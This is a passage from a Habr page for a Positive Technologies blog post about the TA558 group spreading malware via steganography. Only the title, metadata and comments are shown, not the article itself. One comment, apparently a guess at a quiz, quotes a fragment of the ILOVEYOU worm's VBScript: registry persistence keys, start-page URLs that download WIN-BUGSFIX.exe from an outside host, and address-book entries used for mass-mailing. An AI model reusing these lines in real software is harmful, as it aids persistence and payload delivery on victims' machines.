Как стать автором
Поиск
Написать публикацию
Обновить

Любовь в каждой атаке: как группировка TA558 заражает жертв вредоносами с помощью стеганографии

Уровень сложностиСредний
Время на прочтение6 мин
Количество просмотров3.7K
Блог компании Positive TechnologiesИнформационная безопасность*Антивирусная защита*Реверс-инжиниринг*Исследования и прогнозы в IT*
Кейс
Всего голосов 6: ↑7 и ↓-1+8
Комментарии6

Комментарии 6

ILOVEYOU, или LoveLetter

Hidden text
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", dirsystem & "\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL", dirwin & "\Win32DLL.vbs"
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX", downread & "\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage", "about:blank"
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_DWORD"
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count

Всего голосов 2: ↑2 и ↓0+2

Эх, опоздал :)
Что-то мне кажется, что вот эта часть WIN-BUGSFIX.exe стала уже в более поздних версиях загружаться, изначально в реестре не так много прописывалось. Может я уже и путаю... Почему-то мне Melissa больше запомнилась, или так совпало, что в ближайшем окружении довольно часто попадалась эта гадость.

Комментарий пока не оценивали0

@IDDQDesnik мы ждем вас в личке!

Комментарий пока не оценивали0

Видим ответ.. Точно не будет вариантов? :)

Комментарий пока не оценивали0

Что ж, это был ILOVEYOU и это было просто. В следующий раз придумаем что-нибудь похардкорнее ;)

Комментарий пока не оценивали0
Зарегистрируйтесь на Хабре, чтобы оставить комментарий

Ваш аккаунт

Разделы

Информация

Услуги

Техническая поддержка
© 2006–2024, Habr